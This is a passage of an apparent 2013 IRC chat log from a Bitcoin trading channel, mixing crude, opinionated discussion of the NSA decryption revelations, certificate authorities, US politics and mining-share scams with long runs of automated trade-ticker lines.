00:37:19 this is 2012 subject matter. go review the various agreements of insurance and otherwise that deprived detailed for general lulzbenefit. Sep 06 00:37:32 jurov i guess i typoed. Sep 06 00:37:40 somehow I can't find the pictures of creepy kSLAUGHTER again Sep 06 00:37:42 xD Sep 06 00:38:37 "The new Snowden revelations are explosive. Basically, the NSA is able to decrypt most of the Internet." Sep 06 00:38:40 fuckling retard this guy,. Sep 06 00:38:54 mp says "https is unfit for security". people keep ranting about how it's really fine. Sep 06 00:39:04 then it turns out it's not fine. schneider says mp was right, we're all fucktards ? Sep 06 00:39:11 no, schneider says "o, the internet is broken" Sep 06 00:39:30 no you doofus. the internet is just fine, you bunch with the "login" crap are broken in the motherfucking head. Sep 06 00:39:33 he says "endpoint software is compromised" Sep 06 00:39:36 later Sep 06 00:40:12 it's a sensational title. actually, I take it as good news because of "They're doing it primarily by cheating, not by mathematics." Sep 06 00:40:24 i.e. yes, the maths are strong Sep 06 00:40:30 yeah. Sep 06 00:40:37 what i don't get is why does he imagine the us govt would stop ? Sep 06 00:40:44 they don't need to stop. people need to stop. Sep 06 00:40:49 quickly skimming I get teh impression they are mostly bending over CAs and such Sep 06 00:40:54 he's very naive on that Sep 06 00:40:56 [BTCTC] [ASICMINER-PT] 1 @ 2.08 BTC [-] Sep 06 00:40:56 dub exactly. Sep 06 00:40:58 [BTCTC] [ASICMINER-PT] 1 @ 2.076 BTC [-] Sep 06 00:40:59 [BTCTC] [ASICMINER-PT] 1 @ 2.06 BTC [-] Sep 06 00:40:59 [BTCTC] [ASICMINER-PT] 3 @ 2.04 = 6.12 BTC [-] Sep 06 00:41:00 [BTCTC] [ASICMINER-PT] 5 @ 2.035 = 10.175 BTC [-] Sep 06 00:41:01 and pwning hardware Sep 06 00:41:01 [BTCTC] [ASICMINER-PT] 1 @ 2.031 BTC [-] Sep 06 00:41:07 which is nothign new Sep 06 00:41:08 stop using models we all know are broken. what the fuck already. Sep 06 00:41:49 funny how I mentioned here that CAs sucked a few days ago, and that namecoin could be an answer! Sep 06 00:42:08 pankkake an answer to what question tho ? Sep 06 00:42:42 [BTCTC] [ASICMINER-PT] 3 @ 2.03 = 6.09 BTC [-] Sep 06 00:42:43 [BTCTC] [ASICMINER-PT] 1 @ 2.03 BTC [-] Sep 06 00:42:45 [BTCTC] [ASICMINER-PT] 2 @ 2.026 = 4.052 BTC [-] Sep 06 00:42:46 [BTCTC] [ASICMINER-PT] 15 @ 2.025 = 30.375 BTC [-] Sep 06 00:42:46 how to authentify a certificate Sep 06 00:42:47 [BTCTC] [ASICMINER-PT] 1 @ 2.022 BTC [-] Sep 06 00:42:48 [BTCTC] [ASICMINER-PT] 1 @ 2.022 BTC [-] Sep 06 00:42:49 [BTCTC] [ASICMINER-PT] 4 @ 2.021 = 8.084 BTC [-] Sep 06 00:42:49 [BTCTC] [ASICMINER-PT] 5 @ 2.02 = 10.1 BTC [-] Sep 06 00:42:50 [BTCTC] [ASICMINER-PT] 1 @ 2.02 BTC [-] Sep 06 00:42:51 [BTCTC] [ASICMINER-PT] 16 @ 2.02 = 32.32 BTC [-] Sep 06 00:43:17 without a third party Sep 06 00:43:21 America the Rapist, bending people and businesses over since forever. Sep 06 00:43:35 pankkake you're still trying to make website-login nonsense work. this is wrong. Sep 06 00:43:48 http is stateless. there's no "logged in" state. Sep 06 00:44:08 [MPEX] [S.MPOE] 5350 @ 0.00089557 = 4.7913 BTC [+] Sep 06 00:44:16 [MPEX] [S.MPOE] 307 @ 0.00089344 = 0.2743 BTC [-] Sep 06 00:44:17 I'm not talking about logins Sep 06 00:44:17 [MPEX] [S.MPOE] 8500 @ 0.00089274 = 7.5883 BTC [-] Sep 06 00:44:23 [MPEX] [S.MPOE] 119 @ 0.00089133 = 0.1061 BTC [-] Sep 06 00:44:23 you are, by extension. Sep 06 00:44:30 [MPEX] [S.MPOE] 1224 @ 0.0008911 = 1.0907 BTC [-] Sep 06 00:44:55 "The NSA describes strong decryption programs as the "price of admission for the US to maintain unrestricted access to and use of cyberspace"." Sep 06 00:45:12 example. http://mpex.co/faq.html#3 mentions 2FB7B452. but how do I trust the page hasn't been altered? Sep 06 00:45:13 Namworld as if anyone asked them lawl. Sep 06 00:45:43 ok, the USG is just at war 24/7 just about everywhere, I think would be the short story about pretty much every news about the US government. Sep 06 00:46:01 pankkake at which point ? Sep 06 00:46:04 Trying to be at an advantage on every front, no matter the costs. Sep 06 00:46:18 between me and your server Sep 06 00:46:27 pankkake at which point in tiome i mean Sep 06 00:46:37 the first time I use it Sep 06 00:46:52 that's the issue: for https, we trust CAs at least for the first time Sep 06 00:46:58 Namworld http://trilema.com/2012/the-crime-of-being-american/ if you scroll down that's you speaking there. how much of it has changed so far ? Sep 06 00:47:05 pankkake not the issue at all. Sep 06 00:47:13 if you're there the first time you have no btc deposited. Sep 06 00:47:24 you deposit on the strength of the quoted sig. if you don't know it, don't deposit. Sep 06 00:47:34 for the 2nd and subsequent times, you know tjhe sig already. Sep 06 00:47:56 well your system isn't really vulnerable Sep 06 00:48:03 well that's kind of the point innit. Sep 06 00:49:48 basically at the very best and under ideal circumstances the CA system is equal to a algorithmic WoT tranversal. Sep 06 00:49:52 this is known to be weak. Sep 06 00:50:10 [BTCTC] [BTC-GOLD] 2 @ 0.0205 = 0.041 BTC [-] Sep 06 00:50:27 i made the much more general point about logins because i'd like it to sink in already, but it can be reduced to discuss the edges of the problem just fine. Sep 06 00:50:52 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1975 = 0.5925 BTC [-] Sep 06 00:51:10 [BTCTC] [LABCOIN] 5 @ 0.003331 = 0.0167 BTC [-] Sep 06 00:51:11 [BTCTC] [TAT.ASICMINER] 6 @ 0.02016 = 0.121 BTC [-] Sep 06 00:51:12 [BTCTC] [TAT.ASICMINER] 9 @ 0.02016 = 0.1814 BTC [-] Sep 06 00:51:59 [BTCTC] [LABCOIN] 49 @ 0.00333 = 0.1632 BTC [-] Sep 06 00:52:02 https://bitcointalk.org/index.php?topic=263445.msg3090712#msg3090712 Sep 06 00:52:03 What's changed? It's no longer accidental collateral damage due to poorly thought laws. US government just actively hit on everything. Sep 06 00:52:10 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 06 00:52:12 "I am willing to take side bets on Labcoin not being a scam. Please PM me if interested." Sep 06 00:52:14 They must find it fun or something. Sep 06 00:52:15 Namworld i meant more in your outlook of things Sep 06 00:52:28 I still wouldn't execute all americans Sep 06 00:52:36 ThickAsThieves just as long as it stays in the generally-unverifiable format of "not being a scam" right ? Sep 06 00:52:58 i guess the good news being that for all the posturing of the scammors, bitbet does control these things. Sep 06 00:53:09 and isnt that what bitbet is for? Sep 06 00:53:17 the criteria for not being a scam is "well, they tried to do something at some point" Sep 06 00:53:25 ThickAsThieves kinda, ya. Sep 06 00:53:28 [BTCTC] [DMS.MINING] 3 @ 0.0023 = 0.0069 BTC [+] Sep 06 00:53:36 pankkake "or at least weren't mean to people" Sep 06 00:53:45 haha Sep 06 00:53:59 [BTCTC] [LABCOIN] 49 @ 0.00333 = 0.1632 BTC [-] Sep 06 00:54:18 Namworld well neither would i, but apparently without the thread of execution they won't behave. Sep 06 00:55:27 [BTCTC] [DMS.SELLING] 100 @ 0.00952 = 0.952 BTC [-] Sep 06 00:57:18 http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/ << oddly enough the odds are 2:1 for it delivering Sep 06 00:57:24 BitBet - KnCMiner will deliver ASIC devices before October 1st Sep 06 00:57:43 I bet against it i think Sep 06 00:58:18 https://bitcointalk.org/index.php?topic=288518.msg3091023#msg3091023 Sep 06 00:58:22 [HAVELOCK] CasinoBitco.in (CBTC) IPO Official Thread Sep 06 00:58:38 i agree with pankake and the labcoin dude Sep 06 00:58:43 [BTCTC] [LABCOIN] 2 @ 0.00333 = 0.0067 BTC [-] Sep 06 00:59:00 [BTCTC] [LABCOIN] 5 @ 0.00333 = 0.0167 BTC [-] Sep 06 00:59:03 "HUGE SC2 and Broodwar fan here" how can I hate him now? :( Sep 06 00:59:23 dota 2 as well Sep 06 00:59:34 then you'll get all the gamer kiddies into bitcoin Sep 06 00:59:37 and betting... Sep 06 00:59:42 The US got hit by a FEW terrorist attacks (something something about US' foreign policies) and now they spend god knows how much of the budget on counter-terrorism. With programs that pisses off everyone, citizens, enemies and allies alike. While keeping the foreign military actions of course. Sep 06 00:59:57 All because of votes or something. Sep 06 01:00:19 lack of strong leadership. Sep 06 01:00:20 [BTCTC] [ASICMINER-PT] 1 @ 2.024 BTC [+] Sep 06 01:01:51 Well good luck to them getting out of this situation. They're going to be ruined soon enough. Sep 06 01:02:02 who the hell with any useful abilities would wanna go into american politics Sep 06 01:02:09 this is a real issue at this point Sep 06 01:02:16 [BTCTC] [BASIC-MINING] 1 @ 0.1251 BTC [-] Sep 06 01:02:54 [MPEX] [S.MPOE] 8893 @ 0.00089174 = 7.9302 BTC [+] Sep 06 01:03:50 [BTCTC] [BASIC-MINING] 1 @ 0.125 BTC [-] Sep 06 01:03:51 Terrorists won. They had to do so little. They managed to scare americans. Now US is trying to eat its own tail "For protecting citizens". Sep 06 01:04:37 That's what terrorism is all about. Scaring people into ruining themselves and doing bullshit. Sep 06 01:04:54 Namworld well really... the problem is the gilded impotence. consider : some nutty arabs took 10k worth of shit and destroyed 10 trn worth of "enemy" gear. Sep 06 01:05:11 the enemy got pissed off, took another 10 trn worth of their own gear and destroyed a further 10k worth of arab shit. Sep 06 01:05:22 with such victories... who needs defeats ? Sep 06 01:05:37 [BTCTC] [ACTIVEMINING] 350 @ 0.0049 = 1.715 BTC [-] Sep 06 01:06:05 first rule of conflict is you have to do more damage to the enemy than to yourself. not that you have to "destroy" enemy shit. Sep 06 01:06:25 [BTCTC] [DMS.SELLING] 2 @ 0.00951 = 0.019 BTC [-] Sep 06 01:08:32 [BTCTC] [DMS.MINING] 11 @ 0.0023 = 0.0253 BTC [+] Sep 06 01:09:02 "Funding for the program - $254.9m for this year" Sep 06 01:09:10 the issue is that people don't understand statistics Sep 06 01:09:36 Well every american spent like 0.80 cents this year to break the Internet's encryption and introduce backdoors in products Sep 06 01:09:47 .80 cents they don't have. Sep 06 01:09:53 Talk about a waste. Sep 06 01:10:15 Yeah, of course they don't have it. Deficit is the golden rule. Sep 06 01:10:39 You got to spend on silly things so the electorate loves you. Sep 06 01:10:55 http://www.zerohedge.com/news/2013-09-05/panic-smuggling-diamonds-out-india Sep 06 01:10:59 apparently japan is in the deep Sep 06 01:11:00 This Is Panic: Smuggling Diamonds Out Of India | Zero Hedge Sep 06 01:11:15 who was saying to me japan's going to shit a few days back and i said i've not much clue on the topic ? Sep 06 01:11:18 seems they were right. Sep 06 01:12:25 I'm always right Sep 06 01:12:43 [BTCTC] [DMS.SELLING] 98 @ 0.00951 = 0.932 BTC [-] Sep 06 01:12:44 [BTCTC] [DMS.SELLING] 20 @ 0.009502 = 0.19 BTC [-] Sep 06 01:12:45 [BTCTC] [DMS.SELLING] 167 @ 0.009501 = 1.5867 BTC [-] Sep 06 01:13:18 lol dangerous thing to be, but good for you! Sep 06 01:13:54 [BTCTC] [ACTIVEMINING] 100 @ 0.0049 = 0.49 BTC [-] Sep 06 01:15:01 how do i open account on singapore? Sep 06 01:15:19 two places that have taken a different approach to rolling out cognitave dissonance than the US Sep 06 01:15:50 jurov logically the first step would be to retain counsel there. Sep 06 01:16:01 in japan nobody will talk about how fucked things are getting because they might dishonor themselves Sep 06 01:16:27 I used to read a blog that refered to "the race to debase". it looks like japan is winning Sep 06 01:16:40 meanwhile from ryan ong : "Singapore’s finance industry is a real fortress. Those inside want to get out, and those outside want to get in." Sep 06 01:16:48 in india they are so supremely arrogant and retarded that news just doesnt sink in Sep 06 01:17:27 [BTCTC] [ACTIVEMINING] 300 @ 0.0049 = 1.47 BTC [-] Sep 06 01:17:49 Wait... what's happening here... "Shit, the costly pile of controls we've put on the population have ruined us. People are trying to flee the clusterfuck! LET'S PUT MORE CONTROLS SO THEY CAN'T!" Sep 06 01:18:06 whereas the US has an industrial scale racket keeping average joe dumb as dirt Sep 06 01:19:17 [BTCTC] [ACTIVEMINING] 100 @ 0.004967 = 0.4967 BTC [+] Sep 06 01:19:20 dub more precisely, an industrial scale racket empowering joe dumb's laziness and stupidity by providing "distractions" Sep 06 01:19:37 meh chicken or egg Sep 06 01:20:01 the old "are people fundamentally good or fundamentally evil" debate. Sep 06 01:20:08 wanna be socrates or diogenes ? Sep 06 01:21:14 I'd be on the side that they're neither good or evil. Sep 06 01:21:14 [BTCTC] [LABCOIN] 19 @ 0.003329 = 0.0633 BTC [-] Sep 06 01:21:50 marxist. Sep 06 01:22:30 [BTCTC] [DMS.MINING] 1 @ 0.002285 BTC [-] Sep 06 01:22:32 [BTCTC] [DMS.MINING] 11 @ 0.002285 = 0.0251 BTC [-] Sep 06 01:22:40 most of them tell me people are evil Sep 06 01:22:46 except them of course (?) Sep 06 01:22:52 [BTCTC] [KENILWORTH] 556 @ 0.0018 = 1.0008 BTC [+] Sep 06 01:23:19 https://bitcointalk.org/index.php?topic=288588.0 Sep 06 01:23:23 Looking for investment Sep 06 01:23:40 Everyone does wrong and good. I've yet to meet a saint or a devil among the population. Sep 06 01:24:15 the movie bad guy doesn't exist; most people try to rationalize their wrongdoings Sep 06 01:24:38 get out more Sep 06 01:24:48 [BTCTC] [DMS.MINING] 1 @ 0.002285 BTC [-] Sep 06 01:25:20 [BTCTC] [TAT.ASICMINER] 6 @ 0.02162 = 0.1297 BTC [+] Sep 06 01:25:28 [BTCTC] [ACTIVEMINING] 100 @ 0.0049 = 0.49 BTC [-] Sep 06 01:25:29 Well there's some people that are close to being "pure" "evil" or "saint" Sep 06 01:25:29 [BTCTC] [ACTIVEMINING] 200 @ 0.0049 = 0.98 BTC [-] Sep 06 01:25:46 But if we take a large population, it's quite mixed. Sep 06 01:26:26 I'd be hard pressed saying if people or mostly good or mostly evil. Depends on your definition of good/evil I guess. Sep 06 01:26:44 [HAVELOCK] [XBOND] 100 @ 0.00111 = 0.111 BTC [+] Sep 06 01:26:58 there is no good or evil Sep 06 01:27:04 only experience Sep 06 01:27:36 wtf is going on with btc/usd Sep 06 01:27:40 what about lawful vs. chaotic? ;) Sep 06 01:27:45 10 dollar gap down Sep 06 01:28:03 tards panicing becuase encryption is broken Sep 06 01:28:12 [BTCTC] [DMS.MINING] 680 @ 0.002285 = 1.5538 BTC [-] Sep 06 01:28:37 pankkake, lol Sep 06 01:31:03 aw, didn't last Sep 06 01:31:14 "Another program, codenamed Cheesy Name, was aimed at singling out encryption keys, known as 'certificates', that might be vulnerable to being cracked by GCHQ supercomputers." Sep 06 01:31:31 Cheesy Name... is... a... cheesy name Sep 06 01:33:35 Please... kill me Sep 06 01:33:55 Amazing Cheesy Name Sep 06 01:36:22 The Adventures of The Amazing CheesyName Sep 06 01:37:01 And a good quote in the comments section of the article "If you want a vision of the future, Winston, imagine a boot stamping on a human face - forever." Sep 06 01:37:03 so my mother came by. she's brought me one of each of all the cakes i liked as a kid. Sep 06 01:37:06 i will probably die. Sep 06 01:37:19 ok, I think I reached the end of this article. Sep 06 01:37:25 birthday? or just so? Sep 06 01:37:32 jurov just so. Sep 06 01:37:34 Watch out for diabetes Mircea Sep 06 01:37:46 Namworld diabetes takes too long. i'll just explode. Sep 06 01:37:59 [BTCTC] [ASICMINER-PT] 5 @ 2.025 = 10.125 BTC [+] Sep 06 01:37:59 [BTCTC] [ASICMINER-PT] 1 @ 2.023 BTC [-] Sep 06 01:38:00 [BTCTC] [ASICMINER-PT] 1 @ 2.022 BTC [-] Sep 06 01:38:00 i bought myself a five liter milk bottle Sep 06 01:38:00 [BTCTC] [ASICMINER-PT] 4 @ 2.02 = 8.08 BTC [-] Sep 06 01:38:01 [BTCTC] [ASICMINER-PT] 1 @ 2.016 BTC [-] Sep 06 01:38:02 [BTCTC] [ASICMINER-PT] 10 @ 2.015 = 20.15 BTC [-] Sep 06 01:38:03 [BTCTC] [ASICMINER-PT] 2 @ 2.014 = 4.028 BTC [-] Sep 06 01:38:03 and i've been working at it. Sep 06 01:38:04 [BTCTC] [ASICMINER-PT] 10 @ 2.013 = 20.13 BTC [-] Sep 06 01:38:05 [BTCTC] [ASICMINER-PT] 3 @ 2.013 = 6.039 BTC [-] Sep 06 01:38:07 [BTCTC] [ASICMINER-PT] 5 @ 2.012 = 10.06 BTC [-] Sep 06 01:38:08 [BTCTC] [ASICMINER-PT] 2 @ 2.012 = 4.024 BTC [-] Sep 06 01:38:09 [BTCTC] [ASICMINER-PT] 3 @ 2.011 = 6.033 BTC [-] Sep 06 01:38:10 [BTCTC] [ASICMINER-PT] 1 @ 2.01 BTC [-] Sep 06 01:38:11 [BTCTC] [ASICMINER-PT] 10 @ 2.01 = 20.1 BTC [-] Sep 06 01:38:12 [BTCTC] [ASICMINER-PT] 1 @ 2.008 BTC [-] Sep 06 01:38:13 [BTCTC] [ASICMINER-PT] 2 @ 2.001 = 4.002 BTC [-] Sep 06 01:38:14 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] Sep 06 01:38:15 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] Sep 06 01:38:16 [BTCTC] [ASICMINER-PT] 5 @ 2 = 10 BTC [-] Sep 06 01:38:17 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] Sep 06 01:38:18 [BTCTC] [ASICMINER-PT] 5 @ 2 = 10 BTC [-] Sep 06 01:38:19 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] Sep 06 01:38:20 [BTCTC] [ASICMINER-PT] 2 @ 1.991 = 3.982 BTC [-] Sep 06 01:38:21 [HAVELOCK] [SMG] 200 @ 0.00022 = 0.044 BTC [-] Sep 06 01:38:24 [HAVELOCK] [SMG] 1 @ 0.00021 BTC [-] Sep 06 01:38:26 [HAVELOCK] [SMG] 50 @ 0.0002 = 0.01 BTC [-] Sep 06 01:38:27 [HAVELOCK] [SMG] 249 @ 0.0001902 = 0.0474 BTC [-] Sep 06 01:38:47 thats some cheap AM Sep 06 01:39:08 [HAVELOCK] [LABCO] 25 @ 0.0035 = 0.0875 BTC [+] Sep 06 01:39:19 dub you're too sarcastic for the internet. Sep 06 01:39:26 im srs Sep 06 01:39:47 they are still able to instantly sell out of ridiculously over priced kit Sep 06 01:39:50 well then buy some. Sep 06 01:40:16 the moron fields are still ripe for picking Sep 06 01:41:23 [HAVELOCK] [SMG] 11 @ 0.0001902 = 0.0021 BTC [-] Sep 06 01:41:28 I guess everyone's waiting for the bottom Sep 06 01:42:13 It can go a lot lower Sep 06 01:42:28 i hereby officially announce teh bottom Sep 06 01:42:52 [BTCTC] [LABCOIN] 3 @ 0.003321 = 0.01 BTC [-] Sep 06 01:42:53 [BTCTC] [LABCOIN] 20 @ 0.003301 = 0.066 BTC [-] Sep 06 01:42:55 [BTCTC] [LABCOIN] 35 @ 0.003301 = 0.1155 BTC [-] Sep 06 01:42:56 [BTCTC] [LABCOIN] 366 @ 0.0033 = 1.2078 BTC [-] Sep 06 01:43:06 [BTCTC] [BTC-GOLD] 4 @ 0.015 = 0.06 BTC [-] Sep 06 01:43:08 [BTCTC] [BTC-GOLD] 5 @ 0.005949 = 0.0297 BTC [-] Sep 06 01:43:08 no u, stfu Sep 06 01:43:09 [BTCTC] [BTC-GOLD] 83 @ 0.005948 = 0.4937 BTC [-] Sep 06 01:43:10 jurov the bottom never has 9 in it Sep 06 01:43:25 "teh" bottom not good enough. I need a "Absolute" bottom Sep 06 01:43:52 absolute ass? there's aplenty Sep 06 01:44:06 or at worse a "THE" bottom in all caps. Sep 06 01:44:07 [HAVELOCK] [SDSTM] 2 @ 0.00327 = 0.0065 BTC [-] Sep 06 01:44:15 http://www.mailpile.is/blog/2013-09-05_PayPal_Freezes_Campaign_Funds.html Sep 06 01:44:18 Mailpile: PayPal Freezes Campaign Funds Sep 06 01:44:21 paypal BFL inspired policies. Sep 06 01:44:29 [HAVELOCK] [SDSTM] 6 @ 0.003289 = 0.0197 BTC [+] Sep 06 01:44:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.02027 BTC [-] Sep 06 01:44:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.02026 BTC [-] Sep 06 01:44:42 [HAVELOCK] [AM100] 3 @ 0.0218 = 0.0654 BTC [-] Sep 06 01:45:37 [HAVELOCK] [LABCO] 5 @ 0.0035 = 0.0175 BTC [+] Sep 06 01:46:26 [HAVELOCK] [XBOND] 12 @ 0.00111995 = 0.0134 BTC [+] Sep 06 01:47:44 [HAVELOCK] [XBOND] 5 @ 0.00111995 = 0.0056 BTC [+] Sep 06 01:58:55 [BTCTC] [BASIC-MINING] 4 @ 0.1251 = 0.5004 BTC [+] Sep 06 02:00:03 [BTCTC] [LABCOIN] 288 @ 0.003327 = 0.9582 BTC [+] Sep 06 02:00:04 [BTCTC] [LABCOIN] 5 @ 0.003328 = 0.0166 BTC [+] Sep 06 02:00:05 [BTCTC] [LABCOIN] 283 @ 0.00333 = 0.9424 BTC [+] Sep 06 02:03:38 [BTCTC] [BTC-GOLD] 8 @ 0.00541 = 0.0433 BTC [-] Sep 06 02:06:46 [MPEX] [S.MPOE] 1745 @ 0.00089174 = 1.5561 BTC [+] Sep 06 02:06:48 [MPEX] [S.MPOE] 2023 @ 0.00089362 = 1.8078 BTC [+] Sep 06 02:06:50 [MPEX] [S.MPOE] 9231 @ 0.00089501 = 8.2618 BTC [+] Sep 06 02:08:02 [BTCTC] [ACTIVEMINING] 2 @ 0.004896 = 0.0098 BTC [-] Sep 06 02:08:04 [BTCTC] [ACTIVEMINING] 8 @ 0.004895 = 0.0392 BTC [-] Sep 06 02:09:48 [BTCTC] [ASICMINER-PT] 1 @ 2.01 BTC [+] Sep 06 02:11:16 [BTCTC] [ACTIVEMINING] 2 @ 0.004895 = 0.0098 BTC [-] Sep 06 02:13:02 [BTCTC] [ACTIVEMINING] 10 @ 0.004889 = 0.0489 BTC [-] Sep 06 02:16:27 [BTCTC] [LABCOIN] 20 @ 0.003377 = 0.0675 BTC [+] Sep 06 02:16:44 [BTCTC] [LABCOIN] 1 @ 0.003377 BTC [+] Sep 06 02:18:02 [BTCTC] [ACTIVEMINING] 2 @ 0.00489 = 0.0098 BTC [+] Sep 06 02:18:17 [BTCTC] [ACTIVEMINING] 10 @ 0.004889 = 0.0489 BTC [-] Sep 06 02:18:38 [BTCTC] [DMS.SELLING] 616 @ 0.00952 = 5.8643 BTC [+] Sep 06 02:21:40 [BTCTC] [ASICMINER-PT] 1 @ 2.011 BTC [+] Sep 06 02:21:42 [BTCTC] [ASICMINER-PT] 2 @ 2.01 = 4.02 BTC [-] Sep 06 02:21:43 [BTCTC] [ASICMINER-PT] 2 @ 2 = 4 BTC [-] Sep 06 02:21:44 [BTCTC] [ASICMINER-PT] 1 @ 1.99 BTC [-] Sep 06 02:22:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.02039 = 0.0408 BTC [+] Sep 06 02:22:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.02034 = 0.0407 BTC [-] Sep 06 02:22:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.02033 = 0.2033 BTC [-] Sep 06 02:22:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.02021 = 0.0404 BTC [-] Sep 06 02:22:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.0202 = 0.202 BTC [-] Sep 06 02:22:49 [BTCTC] [TAT.ASICMINER] 6 @ 0.02016 = 0.121 BTC [-] Sep 06 02:22:50 [BTCTC] [TAT.ASICMINER] 30 @ 0.02015 = 0.6045 BTC [-] Sep 06 02:22:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.02013 = 0.161 BTC [-] Sep 06 02:22:52 [BTCTC] [TAT.ASICMINER] 30 @ 0.02012 = 0.6036 BTC [-] Sep 06 02:22:58 [BTCTC] [ASICMINER-PT] 1 @ 1.989 BTC [-] Sep 06 02:23:39 [BTCTC] [ACTIVEMINING] 10 @ 0.004889 = 0.0489 BTC [-] Sep 06 02:23:48 [BTCTC] [TAT.ASICMINER] 11 @ 0.02012 = 0.2213 BTC [-] Sep 06 02:23:49 [BTCTC] [TAT.ASICMINER] 28 @ 0.02011 = 0.5631 BTC [-] Sep 06 02:23:50 [BTCTC] [TAT.ASICMINER] 40 @ 0.0201 = 0.804 BTC [-] Sep 06 02:23:51 [BTCTC] [TAT.ASICMINER] 21 @ 0.0201 = 0.4221 BTC [-] Sep 06 02:23:55 http://dilbert.com/dyn/str_strip/000000000/00000000/0000000/100000/90000/4000/800/194803/194803.strip.gif Sep 06 02:24:04 [BTCTC] [ASICMINER-PT] 1 @ 1.989 BTC [-] Sep 06 02:24:11 that is some silly urling Sep 06 02:25:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.02012 = 0.2012 BTC [+] Sep 06 02:25:10 [BTCTC] [TAT.ASICMINER] 16 @ 0.02011 = 0.3218 BTC [-] Sep 06 02:25:12 [BTCTC] [TAT.ASICMINER] 50 @ 0.0201 = 1.005 BTC [-] Sep 06 02:25:13 [BTCTC] [TAT.ASICMINER] 7 @ 0.0201 = 0.1407 BTC [-] Sep 06 02:25:14 [BTCTC] [TAT.ASICMINER] 17 @ 0.0201 = 0.3417 BTC [-] Sep 06 02:25:27 [BTCTC] [ASICMINER-PT] 1 @ 1.989 BTC [-] Sep 06 02:26:28 [BTCTC] [ASICMINER-PT] 2 @ 1.989 = 3.978 BTC [-] Sep 06 02:26:29 [BTCTC] [ASICMINER-PT] 2 @ 1.99 = 3.98 BTC [+] Sep 06 02:26:45 [HAVELOCK] [AM1] 1 @ 2.1 BTC [-] Sep 06 02:27:59 [BTCTC] [ASICMINER-PT] 1 @ 1.989 BTC [-] Sep 06 02:28:01 [BTCTC] [ASICMINER-PT] 1 @ 1.99 BTC [+] Sep 06 02:28:03 [BTCTC] [ACTIVEMINING] 10 @ 0.004888 = 0.0489 BTC [-] Sep 06 02:33:50 [BTCTC] [ASICMINER-PT] 1 @ 1.927 BTC [-] Sep 06 02:34:43 [BTCTC] [ACTIVEMINING] 10 @ 0.004888 = 0.0489 BTC [-] Sep 06 02:34:45 [BTCTC] [ACTIVEMINING] 20 @ 0.004887 = 0.0977 BTC [-] Sep 06 02:34:46 [BTCTC] [ACTIVEMINING] 20 @ 0.004885 = 0.0977 BTC [-] Sep 06 02:34:47 [BTCTC] [ACTIVEMINING] 60 @ 0.004677 = 0.2806 BTC [-] Sep 06 02:34:49 [BTCTC] [ACTIVEMINING] 240 @ 0.004676 = 1.1222 BTC [-] Sep 06 02:34:50 [BTCTC] [ACTIVEMINING] 428 @ 0.004634 = 1.9834 BTC [-] Sep 06 02:34:51 [BTCTC] [ACTIVEMINING] 107 @ 0.00463 = 0.4954 BTC [-] Sep 06 02:34:52 [BTCTC] [ACTIVEMINING] 12 @ 0.004573 = 0.0549 BTC [-] Sep 06 02:34:52 [BTCTC] [ACTIVEMINING] 48 @ 0.004572 = 0.2195 BTC [-] Sep 06 02:34:53 [BTCTC] [ACTIVEMINING] 1 @ 0.004559 BTC [-] Sep 06 02:34:54 [BTCTC] [ACTIVEMINING] 4 @ 0.004558 = 0.0182 BTC [-] Sep 06 02:34:55 [BTCTC] [ACTIVEMINING] 2 @ 0.004501 = 0.009 BTC [-] Sep 06 02:34:56 [BTCTC] [ACTIVEMINING] 10 @ 0.0045 = 0.045 BTC [-] Sep 06 02:34:58 [BTCTC] [ACTIVEMINING] 1 @ 0.0045 BTC [-] Sep 06 02:34:59 [BTCTC] [ACTIVEMINING] 12 @ 0.004458 = 0.0535 BTC [-] Sep 06 02:35:00 [BTCTC] [ACTIVEMINING] 25 @ 0.004457 = 0.1114 BTC [-] Sep 06 02:37:48 [BTCTC] [LABCOIN] 5 @ 0.003321 = 0.0166 BTC [-] Sep 06 02:37:49 [BTCTC] [LABCOIN] 15 @ 0.00332 = 0.0498 BTC [-] Sep 06 02:37:51 [BTCTC] [LABCOIN] 134 @ 0.0033 = 0.4422 BTC [-] Sep 06 02:37:51 [BTCTC] [LABCOIN] 5 @ 0.00329 = 0.0165 BTC [-] Sep 06 02:37:53 [BTCTC] [LABCOIN] 34 @ 0.003254 = 0.1106 BTC [-] Sep 06 02:37:53 [BTCTC] [LABCOIN] 107 @ 0.003253 = 0.3481 BTC [-] Sep 06 02:37:54 [BTCTC] [LABCOIN] 30 @ 0.003253 = 0.0976 BTC [-] Sep 06 02:37:55 [BTCTC] [LABCOIN] 536 @ 0.003236 = 1.7345 BTC [-] Sep 06 02:37:57 [BTCTC] [LABCOIN] 15 @ 0.003235 = 0.0485 BTC [-] Sep 06 02:37:58 [BTCTC] [LABCOIN] 119 @ 0.003235 = 0.385 BTC [-] Sep 06 02:38:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.02013 = 0.0403 BTC [+] Sep 06 02:38:11 [BTCTC] [TAT.ASICMINER] 10 @ 0.02012 = 0.2012 BTC [-] Sep 06 02:38:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.02011 BTC [-] Sep 06 02:38:12 [BTCTC] [TAT.ASICMINER] 8 @ 0.0201 = 0.1608 BTC [-] Sep 06 02:38:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.02006 BTC [-] Sep 06 02:38:15 [BTCTC] [TAT.ASICMINER] 7 @ 0.02005 = 0.1404 BTC [-] Sep 06 02:38:16 [BTCTC] [TAT.ASICMINER] 9 @ 0.02001 = 0.1801 BTC [-] Sep 06 02:38:17 [BTCTC] [TAT.ASICMINER] 16 @ 0.02 = 0.32 BTC [-] Sep 06 02:38:18 [BTCTC] [TAT.ASICMINER] 29 @ 0.02 = 0.58 BTC [-] Sep 06 02:39:02 [BTCTC] 